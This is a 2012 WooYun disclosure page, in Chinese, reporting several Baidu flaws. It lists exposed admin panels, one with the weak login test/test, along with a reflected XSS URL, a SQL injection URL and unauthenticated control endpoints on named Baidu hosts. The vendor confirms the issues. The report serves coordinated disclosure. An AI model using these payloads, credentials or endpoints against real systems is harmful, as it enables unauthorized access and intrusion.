漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-06777
漏洞标题:百度漏洞合集
相关厂商:百度
漏洞作者: Dico
提交时间:2012-05-07 17:36
修复时间:2012-06-21 17:36
公开时间:2012-06-21 17:36
漏洞类型:未授权访问/权限绕过
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-05-07: 细节已通知厂商并且等待厂商处理中
2012-05-08: 厂商已经确认,细节仅向厂商公开
2012-05-18: 细节向核心白帽子及相关领域专家公开
2012-05-28: 细节向普通白帽子公开
2012-06-07: 细节向实习白帽子公开
2012-06-21: 细节向公众公开
简要描述:
百度漏洞合集
详细说明:
发现后台两枚:
http://sfcrm.baidu.com/ 百度客户管理系统
http://bnms.baidu.com/bnms/index.do 全国监控网 存在弱口令test/test
http://123.125.68.120/ 客户端软件评测中心
存在跨站:
http://123.125.68.120/clientva/web/p2p/fid_noseeder.php?date=2012-05-06%3Cscript%3Ealert(/xss/)%3C/script%3E
注入:
http://123.125.68.120/clientva/web/p2p/show.php?date="or 1=1/*;ls
客户端后端系统业务监控平台绕过授权直接登入
http://123.125.68.120/clientbeop/web/
绕过授权模式添加控件:
http://mic1.baidu.com:8091/static/ludi/control/
http://mic2.baidu.com:8091/static/ludi/control/
http://mic3.baidu.com:8091/static/ludi/control/
http://mic4.baidu.com:8091/static/ludi/control/
http://mic5.baidu.com:8091/static/ludi/control/
http://mic6.baidu.com:8091/static/ludi/control/
http://mic7.baidu.com:8091/static/ludi/control/
http://mic8.baidu.com:8091/static/ludi/control/
http://mic9.baidu.com:8091/static/ludi/control/
测试IP:113.116.89.38 下午闲来无聊手痒,怕跨省于我而提交之~切勿跨省我,3Q!有问题可发email于我~~
漏洞证明:
修复方案:
简单
版权声明:转载请注明来源 Dico@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2012-05-08 14:50
厂商回复:
此问题大部分为测试页面,后台两枚均为对公网开放部分,感谢提交
最新状态:
暂无